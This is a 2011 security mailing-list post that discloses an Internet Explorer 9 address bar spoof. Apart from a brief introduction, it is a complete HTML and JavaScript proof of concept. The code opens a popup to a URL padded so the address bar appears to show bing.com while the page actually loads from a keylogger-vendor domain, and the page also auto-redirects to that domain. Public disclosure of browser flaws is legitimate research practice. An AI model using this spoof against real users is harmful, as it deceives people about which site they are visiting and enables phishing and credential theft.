[Full-disclosure] IE9 Address Bar Spoof
cyber flash
cyber_flash at hotmail.com
Sat Mar 5 17:48:58 GMT 2011
IE9 Address Bar Spoof: For a quick demo, please visit
http://keyloggeronline.com/misc/temp/about.htm
Thanks.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="REFRESH" content="10;url=http://www.keyloggeronline.com/index.php">
<title>Spoof</title>
<script>
function myOpen() {
var mywin=open('about:blank',"mywindow",'location=1,scrollbars=0,width=300,height=290');
mywin.location.href="http://www.keyloggeronline.com/misc/temp/a.php?http://www.bing.com/"+Array(5).join(' ')+' ';
self.blur();
}
</script>
</head>
<body onclick="myOpen();">
Click anywhere on this page!
</body>
</html>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110305/91548d79/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.